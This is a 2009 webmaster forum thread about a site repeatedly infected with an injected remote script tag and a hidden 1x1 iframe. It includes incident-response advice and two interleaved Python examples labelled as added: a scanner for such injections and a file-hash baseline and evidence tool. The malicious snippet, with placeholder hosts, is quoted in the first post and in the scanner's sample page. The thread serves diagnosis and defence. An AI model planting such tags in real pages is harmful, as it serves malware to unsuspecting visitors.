Home / Forums Index / Code, Content, and Presentation / HTML

HTML Forum

    
Infected site - need help!
by iframe
Schism




msg:3897596
 9:06 am on Apr 22, 2009 (gmt 0)

Hi, I have a big problem with my site, which has been infected a couple of times. My site was infected with malicious code:


<!-- ad --><script language=javascript src="http://example.com/show.js"></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

I scanned my computer (with Kaspersky) and found no viruses; I changed my FTP password, with no result. Even though I deleted this code, after a few days the problem reappears. Has anybody had a similar issue? Maybe you guys know the solution for this. I also read an article about it, but still no solution.

Schism.

[edited by: tedster at 8:22 pm (utc) on April 22, 2009]
[edit reason] switch to example.com [/edit]
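An added example, not code from the thread: a small Python scanner for the two injection patterns quoted above, a `<script src=...>` loaded from a host that is not ours and a 1x1 or CSS-hidden `<iframe>`. The allowlist of script hosts (ALLOWED_HOSTS) and the sample page are constructed for illustration; running something like this over the site's HTML and PHP files after each clean-up shows a reinfection the day it happens rather than when a visitor complains.

```python
"""
Added example, not code from the thread: scan HTML for the two injection
patterns quoted above, a <script src=...> loaded from a host that is not ours
and a 1x1 or CSS-hidden <iframe>. ALLOWED_HOSTS and SAMPLE_PAGE are constructed
for illustration.
"""
import re
from pathlib import Path
from urllib.parse import urlparse

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')

# Hosts we expect to serve our own scripts (assumption for the example).
ALLOWED_HOSTS = {"static.example.org"}


def _attrs(tag_body):
    """Parse key=value attributes of one tag into a dict with lower-case keys."""
    out = {}
    for m in ATTR_RE.finditer(tag_body):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def _tiny(value):
    """True for a width/height of 0 or 1 (with or without a px suffix)."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def _hidden(style):
    """True when the inline style hides the element."""
    s = style.replace(" ", "").lower()
    return "visibility:hidden" in s or "display:none" in s


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, src) findings: 'external-script' or 'hidden-iframe'."""
    findings = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        host = urlparse(src).hostname          # None for relative paths (local script)
        if host and host.lower() not in allowed_hosts:
            findings.append(("external-script", src))
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        tiny = _tiny(a.get("width", "")) and _tiny(a.get("height", ""))
        if tiny or _hidden(a.get("style", "")):
            findings.append(("hidden-iframe", a.get("src", "")))
    return findings


def scan_tree(root, allowed_hosts=ALLOWED_HOSTS, suffixes=(".html", ".htm", ".php")):
    """Scan every page under root; returns {relative path: findings} for hits only."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_html(path.read_text(errors="replace"), allowed_hosts)
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed sample page: two legitimate scripts, then the injected pair.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="http://static.example.org/analytics.js"></script>
</head><body>
<!-- ad --><script language=javascript src=http://example.com/show.js></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://www.example.org/embed" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {src}")
```

The script-host allowlist is the important part: the injected tag in the thread looks exactly like a legitimate ad or analytics include, so matching on "looks suspicious" is not enough; anything loaded from a host you did not put there is a finding.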

 

tedster




msg:3898036
 8:36 pm on Apr 22, 2009 (gmt 0)

Hello Schism, and welcome to the forums.

The steps you took would stop the problem if it originates on your local computer. I think it's more likely that the malicious code is being injected directly on your server. It's very important these days to keep all your server applications updated with the most recent patches and software versions.

I know that tech support at many web hosts would like to blame these hacks on poor password security - but in my experience, that's not the core problem. The core problem is using unpatched versions of server applications. Once a common program has been in use for a while, the "dark forces" WILL find security loopholes they can use to hack in.

Schism




msg:3898330
 6:37 am on Apr 23, 2009 (gmt 0)

Thanks for the reply (and the editing ;) Tedster.
I scanned my PC to avoid uploading infected files to the server.
The problem is also that the issue appears on a page which is not an application/CMS etc. It's just simple HTML + a few elements in PHP and a little bit of JavaScript, but nothing fancy ;).
I also think that the malicious code is injected directly on the server. But still no solution :\

neil665




msg:3898347
 7:13 am on Apr 23, 2009 (gmt 0)

Similar malicious code has been added to my home page recently; this has happened a few times and the code varies each time it has been added.

Have changed my password and will wait to see what happens in the future.

Regards

Neil

rodeorose




msg:3898358
 7:27 am on Apr 23, 2009 (gmt 0)

Hi there- what's the best way of picking up malicious code like that? Is Kaspersky enough or should I be doing more? tnx!

Schism




msg:3898551
 12:11 pm on Apr 23, 2009 (gmt 0)

@neil665

I've changed passwords too, but that didn't help.

tedster




msg:3898889
 6:55 pm on Apr 23, 2009 (gmt 0)

There's a lot of detail about dealing with different kinds of server hacks in our Google Search forum:

How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]

swa66




msg:3899125
 11:52 pm on Apr 23, 2009 (gmt 0)

Changing your password is unlikely to help if your server is somehow vulnerable.

Security staff usually has a six step response in place for dealing with security incidents:

1. Prepare

Too late now for some of you, but there is a load to do both to avoid the problems and to prepare what you do when you have an incident.

2. Identification and Detection

Chain of custody starts here. Assigning leadership to the response is also done here, as is coordination.

3. Containment

Make sure it doesn't get worse.

Thing is, once a hacker can change files on a web server, the game is almost over. Either they got access to a database (e.g. via SQL injection, something you should learn about and prevent in step 1), and now the entire database can't be trusted any longer. What if they also changed something else unnoticed (even accidentally)?

Or they found another way in, and you need to identify (step 2) the way they used to get in from your logs.

Decisions need to be taken here: continue vs. abort ? There's risk and benefits in both, so the risks should be evaluated.

Backup of the hacked system ?
- preserve what you still have
- preserve evidence
- ...
DO NOT overwrite older backups doing this.
(step 1: prepare for making this backup ...)

4. Eradication

Find and remove the vulnerability. Improve defenses.
Find all that went on after the initial attack, and learn from that.

5. Recovery

Yes, almost the last step: recover: reinstall systems as needed (it's most often easier to start again than to trust something that was hacked and where you might not have found all backdoors, rootkits etc.). It removes a lingering doubt you'll always have if you don't do this.

Rebuild data to a known safe state.

Be extremely careful with any data from the backup in Step 3, but also with older backups, as they too can already contain problems (don't reintroduce the vulnerability etc.).

Validation and putting back in business is part of this of course.

6. Lessons learned
Probably the most important one as you use it to feed the entire process and improve every step to do better next time. To train developers so they can code with less problems, to improve the preparedness to incidents, to improve communication, ...

Important here is that you can also learn from incidents that others have had.

These steps aren't always fully sequential, but don't try to get back in business before you know what happened as it'll backfire badly in my experience.

Now I realize most of you don't manage your own servers, so your situation is more complex as you'll need to coordinate this with the provider of that service. It's entirely possible the host got whacked not due to something you did, but your neighbor or the machine itself might have introduced something that got exploited. Few hosts are going to be very open in their communication about this, but you need to involve them anyway as much as possible.
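As an added example (not swa66's or the thread's code), the Prepare / Identification / Containment steps above applied to a small static site, in Python: a baseline of SHA-256 hashes taken while the site is known clean (step 1), a diff of a fresh manifest against that baseline listing added, modified and removed files (step 2), and an evidence copy that always goes to a new timestamped directory and refuses to overwrite an older one (step 3). Directory names, the sample pages and the simulated "infection" in demo() are constructed for illustration.

```python
"""
Added example, not from the thread: the Prepare / Identification / Containment
steps for a small static site.
  build_manifest()    - SHA-256 of every file under the webroot; taken while the
                        site is known clean, this is the baseline (step 1).
  diff_manifest()     - baseline vs. a fresh manifest: added / modified / removed
                        files, i.e. what to go looking for in the logs (step 2).
  preserve_evidence() - copy the webroot to a new timestamped directory, hash the
                        copy, and refuse to overwrite anything already there (step 3).
Directory names and sample pages are constructed for illustration.
"""
import hashlib
import json
import os
import shutil
import tempfile
import time
from pathlib import Path


def build_manifest(root):
    """Map each file's path (relative, POSIX style) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        digest = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                digest.update(chunk)
        manifest[path.relative_to(root).as_posix()] = digest.hexdigest()
    return manifest


def diff_manifest(baseline, current):
    """Files present now but not in the baseline, changed since it, or gone."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def preserve_evidence(webroot, evidence_root, stamp=None):
    """Copy the (possibly compromised) webroot aside, never over an older copy."""
    stamp = stamp or time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
    dest = Path(evidence_root) / f"webroot-{stamp}"
    if dest.exists():
        raise FileExistsError(f"refusing to overwrite existing evidence copy: {dest}")
    shutil.copytree(webroot, dest, symlinks=True)
    manifest = build_manifest(dest)
    # Hashes of the copy, stored beside it, so it can later be shown unaltered.
    with open(dest.parent / f"{dest.name}.sha256.json", "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)
    for p in dest.rglob("*"):          # make the copy read-only
        if p.is_file():
            os.chmod(p, 0o444)
    return dest, manifest


def demo():
    """Simulate the thread's scenario on a throwaway webroot and return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp) / "www"
        web.mkdir()
        (web / "index.html").write_text("<html><body>clean</body></html>")
        (web / "about.html").write_text("<html><body>about us</body></html>")
        baseline = build_manifest(web)                       # step 1: known-clean baseline

        # Constructed "infection": a tag appended, a file dropped, a file removed.
        with open(web / "index.html", "a") as fh:
            fh.write('<iframe src="http://example.net/in.cgi" width=1 height=1></iframe>')
        (web / "dropped.php").write_text("<?php /* attacker-added, constructed */ ?>")
        (web / "about.html").unlink()

        changes = diff_manifest(baseline, build_manifest(web))      # step 2
        _, copy_manifest = preserve_evidence(web, Path(tmp) / "evidence", stamp="demo")
        try:                                                        # step 3: never overwrite
            preserve_evidence(web, Path(tmp) / "evidence", stamp="demo")
            refused = False
        except FileExistsError:
            refused = True
        return {
            "changes": changes,
            "copy_matches_live": copy_manifest == build_manifest(web),
            "second_copy_refused": refused,
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline only helps if it was taken while the site was clean and is stored somewhere the attacker cannot reach from the webroot (the same goes for the evidence copy); a manifest that lives next to the pages can be rewritten along with them.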

dreamcatcher




msg:3899337
 7:16 am on Apr 24, 2009 (gmt 0)

Are you on a shared server? The issue might be being caused by someone else's website.

dc

Schism




msg:3899967
 9:04 pm on Apr 24, 2009 (gmt 0)

@dreamcatcher

No, it's not a shared server. I wonder if it's somehow because of JavaScript... Thanks all for the replies! I already did a backup and improved the security of my website. Now I'm waiting to see what will happen. I will also post any results here :)

edit: I also wonder if it is possible (in your opinion, guys) that the injection of malicious code could have happened because of Google Analytics, since the problem somehow appeared after I installed it. I just don't know if I can connect these two facts somehow.

[edited by: Schism at 9:09 pm (utc) on April 24, 2009]

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved